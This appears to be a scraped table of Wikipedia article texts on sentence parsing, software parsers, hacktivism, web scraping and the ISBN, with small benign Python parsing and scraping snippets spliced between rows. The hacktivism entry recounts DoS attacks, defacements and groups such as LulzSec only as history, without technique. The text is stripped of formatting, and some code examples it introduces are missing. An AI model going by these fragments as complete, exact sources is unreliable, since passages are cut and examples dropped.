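print(cyk_recognize("man bites dog".split(), lexicon, rules))  # True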
10 This is evidenced by several different types of syntactically complex sentences that pose potential issues for mental parsing of sentences. The first, and perhaps most well-known, type of sentence that challenges parsing ability is the garden-path sentence. These sentences are designed so that the most common interpretation of the sentence appears grammatically faulty, but upon further inspection, these sentences are grammatically sound. Garden-path sentences are difficult to parse because they contain a phrase or a word with more than one meaning, often their most typical meaning being a different part of speech. 11 For example, in the sentence, "the horse raced past the barn fell", raced is initially interpreted as a past tense verb, but in this sentence, it functions as part of an adjective phrase. 12 Since parsing is used to identify parts of speech, these sentences challenge the parsing ability of the reader. Another type of sentence that is difficult to parse is an attachment ambiguity, which includes a phrase that could potentially modify different parts of a sentence, and therefore presents a challenge in identifying syntactic relationships (i.e. "The boy saw the lady with the telescope", in which the ambiguous phrase with the telescope could modify the boy saw or the lady.) 11 A third type of sentence that challenges parsing ability is center embedding, in which phrases are placed in the center of other similarly formed phrases (i.e. "The rat the cat the man hit chased ran into the trap".) Sentences with two or, in the most extreme cases, three center embeddings are challenging for mental parsing, again because of ambiguity of syntactic relationship. 13 Within neurolinguistics there are multiple theories that aim to describe how parsing takes place in the brain. One such model is a more traditional generative model of sentence processing, which theorizes that within the brain there is a distinct module designed for sentence parsing, which is preceded by access to lexical recognition and retrieval, and then followed by syntactic processing that considers a single syntactic result of the parsing, only returning to revise that syntactic interpretation if a potential problem is detected. 14 The opposing, more contemporary model theorizes that within the mind, the processing of a sentence is not modular, or happening in strict sequence. Rather, it poses that several different syntactic possibilities can be considered at the same time, because lexical access, syntactic processing, and determination of meaning occur in parallel in the brain. In this way these processes are integrated. 15 Although there is still much to learn about the neurology of parsing, studies have shown evidence that several areas of the brain might play a role in parsing. These include the left anterior temporal pole, the left inferior frontal gyrus, the left superior temporal gyrus, the left superior frontal gyrus, the right posterior cingulate cortex, and the left angular gyrus. Although it has not been absolutely proven, it has been suggested that these different structures might favor either phrase-structure parsing or dependency-structure parsing, meaning different types of parsing could be processed in different ways which have yet to be understood. 16 Discourse analysis examines ways to analyze language use and semiotic events. Persuasive language may be called rhetoric. 
A parser is a software component that takes input data (typically text) and builds a data structure often some kind of parse tree, abstract syntax tree or other hierarchical structure, giving a structural representation of the input while checking for correct syntax. The parsing may be preceded or followed by other steps, or these may be combined into a single step. The parser is often preceded by a separate lexical analyser, which creates tokens from the sequence of input characters; alternatively, these can be combined in scannerless parsing. Parsers may be programmed by hand or may be automatically or semi-automatically generated by a parser generator. Parsing is complementary to templating, which produces formatted output. These may be applied to different domains, but often appear together, such as the scanf printf pair, or the input (front end parsing) and output (back end code generation) stages of a compiler. The input to a parser is typically text in some computer language, but may also be text in a natural language or less structured textual data, in which case generally only certain parts of the text are extracted, rather than a parse tree being constructed. Parsers range from very simple functions such as scanf, to complex programs such as the frontend of a C compiler or the HTML parser of a web browser. An important class of simple parsing is done using regular expressions, in which a group of regular expressions defines a regular language and a regular expression engine automatically generating a parser for that language, allowing pattern matching and extraction of text. In other contexts regular expressions are instead used prior to parsing, as the lexing step whose output is then used by the parser. The use of parsers varies by input. In the case of data languages, a parser is often found as the file reading facility of a program, such as reading in HTML or XML text; these examples are markup languages. In the case of programming languages, a parser is a component of a compiler or interpreter, which parses the source code of a computer programming language to create some form of internal representation; the parser is a key step in the compiler frontend. Programming languages tend to be specified in terms of a deterministic context-free grammar because fast and efficient parsers can be written for them. For compilers, the parsing itself can be done in one pass or multiple passes see one-pass compiler and multi-pass compiler. The implied disadvantages of a one-pass compiler can largely be overcome by adding fix-ups, where provision is made for code relocation during the forward pass, and the fix-ups are applied backwards when the current program segment has been recognized as having been completed. An example where such a fix-up mechanism would be useful would be a forward GOTO statement, where the target of the GOTO is unknown until the program segment is completed. In this case, the application of the fix-up would be delayed until the target of the GOTO was recognized. Conversely, a backward GOTO does not require a fix-up, as the location will already be known. Context-free grammars are limited in the extent to which they can express all of the requirements of a language. Informally, the reason is that the memory of such a language is limited. The grammar cannot remember the presence of a construct over an arbitrarily long input; this is necessary for a language in which, for example, a name must be declared before it may be referenced. 
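The "simple parsing with regular expressions" idea mentioned above can be shown with Python's re module, which is also what this notebook's own cleaning step relies on. The sample string and the key=value pattern below are invented purely for illustration.

import re

# A single pattern extracts key=value pairs from a small config-style string
# instead of building a full parse tree; the regular expression defines the
# (regular) language being recognised.
sample = "host=example.org; port=8080; secure=true"
pairs = dict(re.findall(r"(\w+)=([^;]+)", sample))
print(pairs)   # {'host': 'example.org', 'port': '8080', 'secure': 'true'}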
More powerful grammars that can express this constraint, however, cannot be parsed efficiently. Thus, it is a common strategy to create a relaxed parser for a context-free grammar which accepts a superset of the desired language constructs (that is, it accepts some invalid constructs); later, the unwanted constructs can be filtered out at the semantic analysis (contextual analysis) step. For example, in Python the following is syntactically valid code: The following code, however, is syntactically valid in terms of the context-free grammar, yielding a syntax tree with the same structure as the previous, but violates the semantic rule requiring variables to be initialized before use: The following example demonstrates the common case of parsing a computer language with two levels of grammar: lexical and syntactic. The first stage is the token generation, or lexical analysis, by which the input character stream is split into meaningful symbols defined by a grammar of regular expressions. For example, a calculator program would look at an input such as "12 * (3 + 4) ^ 2" and split it into the tokens 12, *, (, 3, +, 4, ), ^, 2, each of which is a meaningful symbol in the context of an arithmetic expression. The lexer would contain rules to tell it that the characters *, +, ^, ( and ) mark the start of a new token, so meaningless tokens like "12*" or "(3" will not be generated. The next stage is parsing or syntactic analysis, which is checking that the tokens form an allowable expression. This is usually done with reference to a context-free grammar which recursively defines components that can make up an expression and the order in which they must appear. However, not all rules defining programming languages can be expressed by context-free grammars alone, for example type validity and proper declaration of identifiers. These rules can be formally expressed with attribute grammars. The final phase is semantic parsing or analysis, which is working out the implications of the expression just validated and taking the appropriate action. 17 In the case of a calculator or interpreter, the action is to evaluate the expression or program; a compiler, on the other hand, would generate some kind of code. Attribute grammars can also be used to define these actions. The task of the parser is essentially to determine if and how the input can be derived from the start symbol of the grammar. This can be done in essentially two ways: LL parsers and recursive-descent parsers are examples of top-down parsers that cannot accommodate left-recursive production rules. Although it has been believed that simple implementations of top-down parsing cannot accommodate direct and indirect left-recursion and may require exponential time and space complexity while parsing ambiguous context-free grammars, more sophisticated algorithms for top-down parsing have been created by Frost, Hafiz, and Callaghan 20 21 which accommodate ambiguity and left recursion in polynomial time and which generate polynomial-size representations of the potentially exponential number of parse trees. Their algorithm is able to produce both left-most and right-most derivations of an input with regard to a given context-free grammar. An important distinction with regard to parsers is whether a parser generates a leftmost derivation or a rightmost derivation (see context-free grammar). LL parsers will generate a leftmost derivation and LR parsers will generate a rightmost derivation (although usually in reverse). 
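The two stages described above, lexical analysis followed by syntactic analysis, can be sketched in Python for the calculator input "12 * (3 + 4) ^ 2". The grammar assumed here (+, -, *, / and right-associative ^ with parentheses) and the evaluator are simplifying assumptions for illustration, not the exact grammar of any particular calculator.

import re

# Stage 1, lexical analysis: split the character stream into tokens.
TOKEN = re.compile(r"\s*(?:(\d+)|(.))")

def tokenize(text):
    tokens = []
    for number, op in TOKEN.findall(text):
        tokens.append(number if number else op)
    return tokens

# Stage 2, syntactic analysis: a small recursive-descent parser that also
# evaluates the expression as it goes (a calculator-style "semantic" action).
def parse(tokens):
    pos = 0

    def peek():
        return tokens[pos] if pos < len(tokens) else None

    def take():
        nonlocal pos
        tok = tokens[pos]
        pos += 1
        return tok

    def base():
        if peek() == "(":
            take()                              # consume "("
            value = expr()
            assert take() == ")", "expected closing parenthesis"
            return value
        return int(take())                      # NUMBER

    def power():                                # right-associative ^
        value = base()
        if peek() == "^":
            take()
            value = value ** power()
        return value

    def term():                                 # * and /
        value = power()
        while peek() in ("*", "/"):
            op = take()
            rhs = power()
            value = value * rhs if op == "*" else value / rhs
        return value

    def expr():                                 # + and -
        value = term()
        while peek() in ("+", "-"):
            op = take()
            rhs = term()
            value = value + rhs if op == "+" else value - rhs
        return value

    result = expr()
    assert pos == len(tokens), "unexpected trailing tokens"
    return result

print(tokenize("12 * (3 + 4) ^ 2"))        # ['12', '*', '(', '3', '+', '4', ')', '^', '2']
print(parse(tokenize("12 * (3 + 4) ^ 2"))) # 588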
18 Some graphical parsing algorithms have been designed for visual programming languages. 22 23 Parsers for visual languages are sometimes based on graph grammars. 24 Adaptive parsing algorithms have been used to construct "self-extending" natural language user interfaces. 25 A simple parser implementation reads the entire input file, performs an intermediate computation or translation, and then writes the entire output file, such as in-memory multi-pass compilers. Alternative parser implementation approaches: Some of the well-known parser development tools include the following: Lookahead establishes the maximum number of incoming tokens that a parser can use to decide which rule it should use. Lookahead is especially relevant to LL, LR, and LALR parsers, where it is often explicitly indicated by affixing the lookahead to the algorithm name in parentheses, such as LALR(1). Most programming languages, the primary target of parsers, are carefully defined in such a way that a parser with limited lookahead, typically one, can parse them, because parsers with limited lookahead are often more efficient. One important change to this trend came in 1990 when Terence Parr created ANTLR for his Ph.D. thesis, a parser generator for efficient LL(k) parsers, where k is any fixed value. LR parsers typically have only a few actions after seeing each token. They are shift (add this token to the stack for later reduction), reduce (pop tokens from the stack and form a syntactic construct), end, error (no known rule applies) or conflict (does not know whether to shift or reduce). Lookahead has two advantages. Example: Parsing the expression 1 + 2 * 3. Most programming languages (except for a few such as APL and Smalltalk) and algebraic formulas give higher precedence to multiplication than addition, in which case the correct interpretation of the example above is 1 + (2 * 3). Note that Rule4 above is a semantic rule. It is possible to rewrite the grammar to incorporate this into the syntax. However, not all such rules can be translated into syntax. Initially, the input is 1, +, 2, *, 3. The parse tree and resulting code from it are not correct according to language semantics. To correctly parse without lookahead, there are three solutions: The parse tree generated is correct and simply more efficient than non-lookahead parsers. This is the strategy followed in LALR parsers. |
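To make the precedence point above concrete: read naively left to right, 1 + 2 * 3 would come out as (1 + 2) * 3 = 9, while the conventional reading is 1 + (2 * 3) = 7. The sketch below uses precedence climbing, one common way to obtain the correct grouping with a single token of lookahead; the precedence table and the pre-split token input are assumptions made for illustration, not the article's own algorithm.

import operator

OPS = {"+": operator.add, "-": operator.sub, "*": operator.mul, "/": operator.truediv}
PREC = {"+": 1, "-": 1, "*": 2, "/": 2}

def parse_expr(tokens, min_prec=1, pos=0):
    # Parse tokens[pos:], consuming only operators with precedence >= min_prec;
    # returns (value, next position). Tokens must already be separated,
    # e.g. "1 + 2 * 3".split().
    value, pos = int(tokens[pos]), pos + 1
    while pos < len(tokens) and PREC.get(tokens[pos], 0) >= min_prec:
        op = tokens[pos]
        # One token of lookahead decides whether to keep extending the current
        # subexpression or hand control back to a lower-precedence level.
        rhs, pos = parse_expr(tokens, PREC[op] + 1, pos + 1)
        value = OPS[op](value, rhs)
    return value, pos

print(parse_expr("1 + 2 * 3".split())[0])   # 7, i.e. 1 + (2 * 3), not (1 + 2) * 3 = 9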
464 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Hacktivism | Internet activism, hacktivism, or hactivism (a portmanteau of hack and activism), is the use of computer-based techniques such as hacking as a form of civil disobedience to promote a political agenda or social change. 1 With roots in hacker culture and hacker ethics, its ends are often related to free speech, human rights, or freedom of information movements. 2 Hacktivist activities span many political ideals and issues. Freenet, a peer-to-peer platform for censorship-resistant communication, is a prime example of translating political thought and freedom of speech into code. Hacking as a form of activism can be carried out by a singular activist or through a network of activists, such as Anonymous and WikiLeaks, working in collaboration toward common goals without an overarching authority figure. 3 4 "Hacktivism" is a controversial term with several meanings. The word was coined to characterize electronic direct action as working toward social change by combining programming skills with critical thinking. But just as hack can sometimes mean cyber crime, hacktivism can be used to mean activism that is malicious, destructive, and undermining the security of the Internet as a technical, economic, and political platform. 5 In comparison to previous forms of social activism, hacktivism has had unprecedented success, bringing in more participants, using more tools, and having more influence in that it has the ability to alter elections, begin conflicts, and take down businesses. 6 According to the United States 2020 2022 Counterintelligence Strategy, in addition to state adversaries and transnational criminal organizations, "ideologically motivated entities such as hacktivists, leaktivists, and public disclosure organizations, also pose significant threats". 7 8 Writer Jason Sack first used the term hacktivism in a 1995 article in conceptualizing New Media artist Shu Lea Cheang's film Fresh Kill. 9 10 However, the term is frequently attributed to the Cult of the Dead Cow (cDc) member "Omega, who used it in a 1996 e-mail to the group. 11 12 Due to the variety of meanings of its root words, the definition of hacktivism is nebulous and there exists significant disagreement over the kinds of activities and purposes it encompasses. Some definitions include acts of cyberterrorism while others simply reaffirm the use of technological hacking to effect social change. 13 14 Self-proclaimed "hacktivists" often work anonymously, sometimes operating in groups while other times operating as a lone wolf with several cyber-personas all corresponding to one activist 15 within the cyberactivism umbrella that has been gaining public interest and power in pop-culture. Hacktivists generally operate under apolitical ideals and express uninhibited ideas or abuse without being scrutinized by society while representing or defending themselves publicly under an anonymous identity giving them a sense of power in the cyberactivism community citation needed . In order to carry out their operations, hacktivists might create new tools; or integrate or use a variety of software tools readily available on the Internet. One class of hacktivist activities includes increasing the accessibility of others to take politically motivated action online citation needed . 
Repertoire of contention of hacktivism includes among others: Depending on who is using the term, hacktivism can be a politically motivated technology hack, a constructive form of anarchic civil disobedience, or an undefined anti-systemic gesture. 28 It can signal anticapitalist or political protest; it can denote anti-spam activists, security experts, or open source advocates. 29 Some people who? describing themselves as hacktivists have taken to defacing websites for political reasons, such as attacking and defacing websites of governments and those who oppose their ideology. 30 Others, such as Oxblood Ruffin (the "foreign affairs minister" of Cult of the Dead Cow and Hacktivismo), have argued forcefully against definitions of hacktivism that include web defacements or denial-of-service attacks. 31 Hacktivism is often seen as shadowy due to its anonymity, commonly attributed to the work of fringe groups and outlying members of society. 15 The lack of responsible parties to be held accountable for the social-media attacks performed by hactivists has created implications in corporate and federal security measures both on and offline. 22 While some self-described hacktivists who? have engaged in DoS attacks, critics suggest who? that DoS attacks are an attack on free speech and that they have unintended consequences. DoS attacks waste resources and they can lead to a "DoS war" that nobody will win citation needed . In 2006, Blue Security attempted to automate a DoS attack against spammers; this led to a massive DoS attack against Blue Security which knocked them, their old ISP and their DNS provider off the Internet, destroying their business. 32 Following denial-of-service attacks by Anonymous on multiple sites, in reprisal for the apparent suppression of WikiLeaks, John Perry Barlow, a founding member of the EFF, said "I support freedom of expression, no matter whose, so I oppose DDoS attacks regardless of their target... they're the poison gas of cyberspace... . 33 On the other hand, Jay Leiderman, an attorney for many hacktivists, argues that DDoS can be a legitimate form of protest speech in situations that are reasonably limited in time, place and manner. 34 WikiLeaks is a media organisation and publisher founded in 2006. It operates as a non-profit and is funded by donations 79 and media partnerships. It has published classified documents and other media provided by anonymous sources. 80 It was founded by Julian Assange, an Australian editor, publisher, and activist, who is currently challenging extradition to the United States over his work with WikiLeaks. 81 Since September 2018, Kristinn Hrafnsson has served as its editor-in-chief. 82 83 Its website states that it has released more than ten million documents and associated analyses. 84 WikiLeaks' most recent publication was in 2021, and its most recent publication of original documents was in 2019. 85 Beginning in November 2022, many of the documents on the organisation's website could not be accessed. 85 86 87 88 WikiLeaks has released document caches and media that exposed serious violations of human rights and civil liberties by various governments. It released footage, which it titled Collateral Murder, of the 12 July 2007 Baghdad airstrike, in which Iraqi Reuters journalists and several civilians were killed by a U.S. helicopter crew. 
89 WikiLeaks has also published leaks such as diplomatic cables from the United States and Saudi Arabia, 90 91 emails from the governments of Syria 92 93 and Turkey, 94 95 96 corruption in Kenya 97 98 and at Samherji. 99 WikiLeaks has also published documents exposing cyber warfare and surveillance tools created by the CIA, 100 101 and surveillance of the French president by the National Security Agency. 102 103 During the 2016 U.S. presidential election campaign, WikiLeaks released emails from the Democratic National Committee (DNC) and from Hillary Clinton's campaign manager, showing that the party's national committee had effectively acted as an arm of the Clinton campaign during the primaries, seeking to undercut the campaign of Bernie Sanders. These releases resulted in the resignation of the chairwoman of the DNC and caused significant harm to the Clinton campaign. 104 During the campaign, WikiLeaks promoted false conspiracy theories about Hillary Clinton, the Democratic Party and the murder of Seth Rich. 105 106 107 WikiLeaks has won a number of awards and has been commended for exposing state and corporate secrets, increasing transparency, assisting freedom of the press, and enhancing democratic discourse while challenging powerful institutions. WikiLeaks and some of its supporters say the organisation's publications have a perfect record of publishing authentic documents. The organisation has been the target of campaigns to discredit it, including aborted ones by Palantir and HBGary. WikiLeaks has also had its donation systems disrupted by problems with its payment processors. As a result, the Wau Holland Foundation helps process WikiLeaks' donations. The organisation has been criticised for inadequately curating some of its content and violating the personal privacy of individuals. WikiLeaks has, for instance, revealed Social Security numbers, medical information, credit card numbers and details of suicide attempts. 108 109 110 News organisations, activists, journalists and former members have also criticised the organisation over allegations of anti-Clinton and pro-Trump bias, various associations with the Russian government, buying and selling of leaks, and a lack of internal transparency. Journalists have also criticised the organisation for promotion of false flag conspiracy theories, and what they describe as exaggerated and misleading descriptions of the contents of leaks. The CIA defined the organisation as a "non-state hostile intelligence service" after the release of Vault 7. 111 Perhaps the most prolific and well known hacktivist group, Anonymous has been prominent and prevalent in many major online hacks over the past decade. Anonymous is a decentralized group that originated on the forums of 4chan during 2003, but didn't rise to prominence until 2008 when they directly attacked the Church of Scientology in a massive DoS attack. 112 Since then, Anonymous has participated in a great number of online projects such as Operation: Payback and Operation: Safe Winter. 113 114 However, while a great number of their projects have been for a charitable cause, 113 they have still gained notoriety from the media due to the nature of their work mostly consisting of illegal hacking. 115 Following the Paris terror attacks in 2015, Anonymous posted a video declaring war on ISIS, 116 the terror group that claimed responsibility for the attacks. 
Since declaring war on ISIS, Anonymous since identified several Twitter accounts associated with the movement in order to stop the distribution of ISIS propaganda. However, Anonymous fell under heavy criticism when Twitter issued a statement calling the lists Anonymous had compiled "wildly inaccurate, as it contained accounts of journalists and academics rather than members of ISIS. 117 Anonymous has also been involved with the Black Lives Matter movement. Early in July 2015, there was a rumor circulating that Anonymous was calling for a Day of Rage protests in retaliation for the shootings of Alton Sterling and Philando Castile, which would entail violent protests and riots. This rumor was based on a video that was not posted with the official Anonymous YouTube account. citation needed None of the Twitter accounts associated with Anonymous had tweeted anything in relation to a Day of Rage, and the rumors were identical to past rumors that had circulated in 2014 following the death of Mike Brown. 118 Instead, on July 15, a Twitter account associated with Anonymous posted a series of tweets calling for a day of solidarity with the Black Lives Matter movement. The Twitter account used the hashtag FridayofSolidarity" to coordinate protests across the nation, and emphasized the fact that the Friday of Solidarity was intended for peaceful protests. The account also stated that the group was unaware of any Day of Rage plans. 119 In February 2017 the group took down more than 10,000 sites on the Dark web related to child porn. 2 DkD , a French cyberhacktivist, was arrested by the OCLCTIC (office central de lutte contre la criminalit li e aux technologies de l’information et de la communication), in March 2003. DkD defaced more than 2000 pages, many were governments and US military sites. Eric Voulleminot of the Regional Service of Judicial Police in Lille classified the young hacker as "the most wanted hacktivist in France" 120 DkD was a very known defacer in the underground for his political view, doing his defacements for various political reasons. In response to his arrest, The Ghost Boys defaced many navy.mil sites using the “Free DkD slogan. 121 122 In May 2011, five members of Anonymous formed the hacktivist group Lulz Security, otherwise known as LulzSec. LulzSec's name originated from the conjunction of the internet slang term "lulz", meaning laughs, and "sec", meaning security. 47 The group members used specific handles to identify themselves on Internet Relay Channels, the most notable being: "Sabu, "Kayla, "T-Flow, "Topiary, "AVUnit, and "Pwnsauce. Though the members of LulzSec would spend up to 20 hours a day in communication, they did not know one another personally, nor did they share personal information. For example, once the members' identities were revealed, "T-Flow" was revealed to be 15 years old. Other members, on the basis of his advanced coding ability, thought he was around 30 years old. 123 One of the first notable targets that LulzSec pursued was HBGary, which was performed in response to a claim made by the technology security company that it had identified members of Anonymous. Following this, the members of LulzSec targeted an array of companies and entities, including but not limited to: Fox Television, Tribune Company, PBS, Sony, Nintendo, and the Senate.gov website. The targeting of these entities typically involved gaining access to and downloading confidential user information, or defacing the website at hand. 
124 LulzSec while not as strongly political as those typical of WikiLeaks or Anonymous, they shared similar sentiments for the freedom of information. One of their distinctly politically driven attacks involved targeting the Arizona State Police in response to new immigration laws. 125 The group's first attack that garnered significant government attention was in 2011, when they collectively took down a website of the FBI. Following the incident, the leader of LulzSec, "Sabu, was identified as Hector Xavier Monsegur by the FBI, and he was the first of the group to be arrested. Immediately following his arrest, Monsegur admitted to criminal activity. He then began his cooperation with the US government, helping FBI authorities to arrest 8 of his co-conspirators, prevent 300 potential cyber attacks, and helped to identify vulnerabilities in existing computer systems. In August 2011, Monsegur pleaded guilty to "computer hacking conspiracy, computer hacking, computer hacking in furtherance of fraud, conspiracy to commit access device fraud, conspiracy to commit bank fraud, and aggravated identity theft pursuant to a cooperation agreement with the government. He served a total of one year and seven months and was charged a $1,200 fine. 126 SiegedSec, short for Sieged Security and commonly self-referred to as the "Gay Furry Hackers", 127 128 is a black-hat criminal hacktivist group that was formed in early 2022, that has committed a number of high profile cyber attacks, including attacks on NATO, 129 130 131 The Idaho National Laboratory, 127 128 and Real America's Voice. 132 133 On July 10, 2024, the group announced that they would be disbanding after attacking The Heritage Foundation. 134 SiegedSec is led by an individual under the alias "vio". 135 Short for "Sieged Security", 136 137 138 SiegedSec's Telegram channel was first created in April 2022, 139 and they commonly refer to themselves as "gay furry hackers". 140 141 On multiple occasions, the group has targeted right-wing movements through breaching data, including The Heritage Foundation, 142 143 Real America's Voice, 144 as well as various U.S. states that have pursued legislative decisions against gender-affirming care. 145 Hacking has been sometime described as a form of culture jamming. 146 : 88 This term refers to the practice of subverting and criticizing political messages as well as media culture with the aim of challenging the status quo. It is often targeted toward subliminal thought processes taking place in the viewers with the goal of raising awareness as well as causing a paradigm shift. Culture jamming takes many forms including billboard hacking, broadcast signal intrusion, ad hoc art performances, simulated legal transgressions, 147 memes, and artivism. citation needed 148 The term "culture jamming" was first coined in 1984 by American musician Donald Joyce of the band Negativland. 149 However, some speculation remains as to when the practice of culture jamming first began. Social researcher Vince Carducci believes culture jamming can be traced back to the 1950s with European social activist group Situationist International. Author and cultural critic Mark Dery believes medieval carnival is the earliest form of culture jamming as a way to subvert the social hierarchy at the time. citation needed Culture jamming is sometimes confused with acts of vandalism. However, unlike culture jamming, the main goal of vandalism is to cause destruction with any political themes being of lesser importance. 
Artivism usually has the most questionable nature as a form of culture jamming because defacement of property is usually involved. citation needed Media hacking refers to the usage of various electronic media in an innovative or otherwise abnormal fashion for the purpose of conveying a message to as large a number of people as possible, primarily achieved via the World Wide Web. 150 151 A popular and effective means of media hacking is posting on a blog, as one is usually controlled by one or more independent individuals, uninfluenced by outside parties. The concept of social bookmarking, as well as Web-based Internet forums, may cause such a message to be seen by users of other sites as well, increasing its total reach. Media hacking is commonly employed for political purposes, by both political parties and political dissidents. A good example of this is the 2008 US Election, in which both the Democratic and Republican parties used a wide variety of different media in order to convey relevant messages to an increasingly Internet-oriented audience. 152 At the same time, political dissidents used blogs and other social media like Twitter in order to reply on an individual basis to the presidential candidates. In particular, sites like Twitter are proving important means in gauging popular support for the candidates, though the site is often used for dissident purposes rather than a show of positive support. 153 Mobile technology has also become subject to media hacking for political purposes. SMS has been widely used by political dissidents as a means of quickly and effectively organising smart mobs for political action. This has been most effective in the Philippines, where SMS media hacking has twice had a significant impact on whether or not the country's Presidents are elected or removed from office. 154 Reality hacking is any phenomenon that emerges from the nonviolent use of illegal or legally ambiguous digital tools in pursuit of politically, socially, or culturally subversive ends. These tools include website defacements, URL redirections, denial-of-service attacks, information theft, web-site parodies, virtual sit-ins, and virtual sabotage. citation needed Art movements such as Fluxus and Happenings in the 1970s created a climate of receptibility in regard to loose-knit organizations and group activities where spontaneity, a return to primitivist behavior, and an ethics where activities and socially engaged art practices became tantamount to aesthetic concerns. clarification needed The conflation of these two histories in the mid-to-late 1990s citation needed resulted in cross-overs between virtual sit-ins, electronic civil disobedience, denial-of-service attacks, as well as mass protests in relation to groups like the International Monetary Fund and the World Bank. The rise of collectives, net.art groups, and those concerned with the fluid interchange of technology and real life (often from an environmental concern) gave birth to the practice of "reality hacking". Reality hacking relies on tweaking the everyday communications most easily available to individuals with the purpose of awakening the political and community conscience of the larger population. The term first came into use among New York and San Francisco artists, but has since been adopted by a school of political activists centered around culture jamming. 
The 1999 science fiction-action film The Matrix, among others, popularized the simulation hypothesis — the suggestion that reality is in fact a simulation of which those affected by the simulants are generally unaware. In this context, "reality hacking" is reading and understanding the code which represents the activity of the simulated reality environment (such as Matrix digital rain) and also modifying it in order to bend the laws of physics or otherwise modify the simulated reality. Reality hacking as a mystical practice is explored in the Gothic-Punk aesthetics-inspired White Wolf urban fantasy role-playing game Mage: The Ascension. In this game, the Reality Coders (also known as Reality Hackers or Reality Crackers) are a faction within the Virtual Adepts, a secret society of mages whose magick revolves around digital technology. They are dedicated to bringing the benefits of cyberspace to real space. To do this, they had to identify, for lack of a better term, the "source code" that allows our Universe to function. And that is what they have been doing ever since. Coders infiltrated a number of levels of society in order to gather the greatest compilation of knowledge ever seen. One of the Coders' more overt agendas is to acclimate the masses to the world that is to come. They spread Virtual Adept ideas through video games and a whole spate of "reality shows" that mimic virtual reality far more than "real" reality. The Reality Coders consider themselves the future of the Virtual Adepts, creating a world in the image of visionaries like Grant Morrison or Terence McKenna. citation needed In a location-based game (also known as a pervasive game), reality hacking refers to tapping into phenomena that exist in the real world, and tying them into the game story universe. 155 There have been various academic approaches to deal with hacktivism and urban hacking. In 2010, G nther Friesinger, Johannes Grenzfurthner and Thomas Ballhausen published an entire reader dedicated to the subject. They state: "Urban spaces became battlefields, signifiers have been invaded, new structures have been established: Netculture replaced counterculture in most parts and also focused on the everchanging environments of the modern city. Important questions have been brought up to date and reasked, taking current positions and discourses into account. The major question still remains, namely how to create culturally based resistance under the influence of capitalistic pressure and conservative politics. 156 |
465 | https://en.wikipedia.org/wiki/Web_scraping | https://nl.wikipedia.org/wiki/Scrapen | Scraping (English: web scraping) is a computing technique in which software is used to extract information from web pages and, optionally, to analyse it. The software usually tries to examine part of the World Wide Web by using the code-based Hypertext Transfer Protocol (HTTP), or by simulating browsing behaviour with a web browser such as Mozilla Firefox. Scraping is closely related to web indexing, in which a bot or web crawler automatically collects and categorises information, a technique applied universally by most search engines. Scraping, by contrast, focuses mainly on converting unstructured data, usually in HTML format, into structured data that can be stored and analysed in a central local database or spreadsheet. Besides search engines, the technique is also often used to gather data when the provider does not give it away or sell it in a structured form, such as through an API. Examples of scraping include online price comparison, gathering of contact details, news articles, monitoring of weather data, detection of changes to websites, research, web mashups and web data integration. In Europe, legislation on text and data mining, of which scraping is a part, was adopted in 2021. It can be found in Articles 3 and 4 of the European directive on copyright and related rights in the digital single market. In the Dutch Copyright Act, these articles have been implemented as Articles 15n and 15o. |
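A minimal sketch of that unstructured-to-structured step, assuming a page that contains at least one HTML table; the URL is only an example, and pandas.read_html does the parsing:

# Minimal sketch: turn an HTML table on a page into structured rows.
# The URL is only an example; any page containing a <table> works similarly.
import requests
import pandas as pd
from io import StringIO

url = "https://en.wikipedia.org/wiki/ISBN"  # example page with tables

html = requests.get(url, timeout=10).text
tables = pd.read_html(StringIO(html))        # every <table> becomes a DataFrame
print(f"Found {len(tables)} tables")
tables[0].to_csv("scraped_table.csv", index=False)  # persist as structured data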
466 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/ISBN_(identifier) | The International Standard Book Number (ISBN) is a numeric commercial book identifier that is intended to be unique. a b Publishers purchase or receive ISBNs from an affiliate of the International ISBN Agency. 2 A different ISBN is assigned to each separate edition and variation of a publication, but not to a simple reprinting of an existing item. For example, an e-book, a paperback and a hardcover edition of the same book must each have a different ISBN, but an unchanged reprint of the hardcover edition keeps the same ISBN. The ISBN is ten digits long if assigned before 2007, and thirteen digits long if assigned on or after 1 January 2007. c The method of assigning an ISBN is nation-specific and varies between countries, often depending on how large the publishing industry is within a country. The first version of the ISBN identification format was devised in 1967, based upon the 9 digit Standard Book Numbering (SBN) created in 1966. The 10 digit ISBN format was developed by the International Organization for Standardization (ISO) and was published in 1970 as international standard ISO 2108 (any 9 digit SBN can be converted to a 10 digit ISBN by prefixing it with a zero). Privately published books sometimes appear without an ISBN. The International ISBN Agency sometimes assigns ISBNs to such books on its own initiative. 4 A separate identifier code of a similar kind, the International Standard Serial Number (ISSN), identifies periodical publications such as magazines and newspapers. The International Standard Music Number (ISMN) covers musical scores. The Standard Book Number (SBN) is a commercial system using nine-digit code numbers to identify books. In 1965, British bookseller and stationers WHSmith announced plans to implement a standard numbering system for its books. 1 They hired consultants to work on their behalf, and the system was devised by Gordon Foster, emeritus professor of statistics at Trinity College Dublin. 5 The International Organization for Standardization (ISO) Technical Committee on Documentation sought to adapt the British SBN for international use. The ISBN identification format was conceived in 1967 in the United Kingdom by David Whitaker 6 7 (regarded as the "Father of the ISBN") 8 and in 1968 in the United States by Emery Koltay 6 (who later became director of the U.S. ISBN agency R. R. Bowker). 8 9 10 The 10 digit ISBN format was developed by the ISO and was published in 1970 as international standard ISO 2108. 1 6 The United Kingdom continued to use the nine-digit SBN code until 1974. ISO has appointed the International ISBN Agency as the registration authority for ISBN worldwide and the ISBN Standard is developed under the control of ISO Technical Committee 46 Subcommittee 9 TC 46 SC 9. The ISO on-line facility only refers back to 1978. 11 An SBN may be converted to an ISBN by prefixing the digit "0". For example, the second edition of Mr. J. G. Reeder Returns, published by Hodder in 1965, has "SBN 340 01381 8", where "340" indicates the publisher, "01381" is the serial number assigned by the publisher, and "8" is the check digit. By prefixing a zero, this can be converted to ISBN 0 340 01381 8; the check digit does not need to be re-calculated. 
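The SBN-to-ISBN conversion described here is easy to sketch; the validity check anticipates the mod-11 check-digit rule explained later in this entry, the sample SBN is the Hodder example above, and the helper names are my own:

def sbn_to_isbn10(sbn: str) -> str:
    """Convert a 9-digit SBN to a 10-digit ISBN by prefixing '0'.
    As noted above, the check digit does not change."""
    return "0" + sbn.replace(" ", "").replace("-", "")

def isbn10_is_valid(isbn10: str) -> bool:
    # Weighted sum (weights 10..1, 'X' counts as 10) must be a multiple of 11.
    vals = [10 if c.upper() == "X" else int(c) for c in isbn10]
    return sum(w * d for w, d in zip(range(10, 0, -1), vals)) % 11 == 0
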